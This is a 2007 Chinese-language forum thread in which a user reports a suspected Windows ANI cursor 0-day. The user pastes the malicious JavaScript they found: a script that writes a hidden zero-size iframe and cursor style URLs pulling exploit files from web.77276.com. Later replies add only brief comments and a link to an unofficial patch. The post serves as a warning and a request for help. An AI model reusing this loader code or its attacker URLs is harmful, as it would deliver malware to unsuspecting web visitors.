风云小站 » 『 求助专区 』 » windows可能存在鼠标指针0-day漏洞
本页主题: windows可能存在鼠标指针0-day漏洞 打印 | 加为IE收藏 | 复制链接 | 收藏主题 | 上一主题 | 下一主题

破晓大地
级别: 初级会员


精华: 0
发帖: 28
威望: 220 点
风云币: 3507 元
专家分: 0 分
在线时间:1(小时)
注册时间:2007-04-01
最后登录:2007-07-11

 windows可能存在鼠标指针0-day漏洞

windows可能存在鼠标指针0-day漏洞

cisrt博客上的描述:http://www.cisrt.org/blog/read.php?301

以下是利用该漏洞一个恶意地址挂马地址:
http://web.77276.com/adv.js?showmatrix_num=056

代码如下:
//读娶src的对象

var v = document.getElementById("advjs");

//读娶src的参数

var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));



document.write("<iframe src=\"http://web.77276.com/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");

document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");

document.writeln("<HTML><HEAD>");

document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");

document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");

document.writeln("<BODY> ");

document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao1.jpg\')\">");

document.writeln("<DIV ");

document.writeln("style=\"CURSOR: url(\'http:\/\/web.77276.com\/muxiao2.jpg\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")



//分析src的参数函数

function getUrlParameterAdv(asName,lsURL){



loU = lsURL.split("?");

if (loU.length>1){



  var loallPm = loU[1].split("&");



  for (var i=0; i<loallPm.length; i++){

  var loPm = loallPm.split("=");

  if (loPm[0]==asName){

    if (loPm.length>1){

    return loPm[1];

    }else{

    return "";

    }

  }

  }

}

return null;

}

我今天中了个  muxiao2.jpg的木马 
可能跟这个有关 
所以发表一下
希望高手赐教
http://www.yhlive.com
顶端 Posted: 2007-04-01 11:23 | [楼 主]
sniper54
级别: 管理员


精华: 6
发帖: 7030
威望: 385 点
风云币: 142429 元
专家分: 101 分
论坛群: 管理团队
在线时间:2219(小时)
注册时间:2006-05-27
最后登录:2024-05-28

 

这个应该发在应用区?
CLWIND.COM
ALL THE BEST FOR YOU!
顶端 Posted: 2007-04-01 11:48 | 1 楼
破晓大地
级别: 初级会员


精华: 0
发帖: 28
威望: 220 点
风云币: 3507 元
专家分: 0 分
在线时间:1(小时)
注册时间:2007-04-01
最后登录:2007-07-11

 

知道了  下次晓得了
http://www.yhlive.com
顶端 Posted: 2007-04-01 20:40 | 2 楼
thinklywsir
级别: 新手上路


精华: 0
发帖: 35
威望: 67 点
风云币: 4137 元
专家分: 0 分
在线时间:16(小时)
注册时间:2007-04-01
最后登录:2008-03-09

 

目前还没有更新补丁吧,也是刚刚听说了
顶端 Posted: 2007-04-01 20:59 | 3 楼
kiva
级别: 初级会员


精华: 0
发帖: 373
威望: 188 点
风云币: 2007 元
专家分: 0 分
在线时间:18(小时)
注册时间:2007-02-11
最后登录:2008-04-28

 

叫人看看去 呵呵
顶端 Posted: 2007-04-02 01:23 | 4 楼
anson
擎云水苑|瓜瓜
级别: 超级会员


精华: 0
发帖: 3487
威望: 1566 点
风云币: 3225 元
专家分: 0 分
论坛群: 擎云水苑
在线时间:672(小时)
注册时间:2006-10-27
最后登录:2008-04-28

 

Windows系统最新漏洞 -> 高危险ANI鼠标指针漏洞非官方免疫补丁

http://www.97sky.cn/downinfo/642.html
这个不知道行不行  
顶端 Posted: 2007-04-02 16:38 | 5 楼
踏雪之痕
级别: 初级会员


精华: 0
发帖: 255
威望: 167 点
风云币: 2107 元
专家分: 0 分
在线时间:67(小时)
注册时间:2007-01-12
最后登录:2008-04-19

 

头一次听说啊,鼠标也有漏洞啊?
顶端 Posted: 2007-04-02 22:53 | 6 楼
帖子浏览记录 版块浏览记录
风云小站 » 『 求助专区 』
感谢,曾经的版主
Total 0.012684(s) query 6, Time now is:11-17 11:36, Gzip enabled 渝ICP备20004412号-1

Powered by PHPWind v6.3.2 Certificate Code © 2003-07 PHPWind.com Corporation
Skin by Chen Bo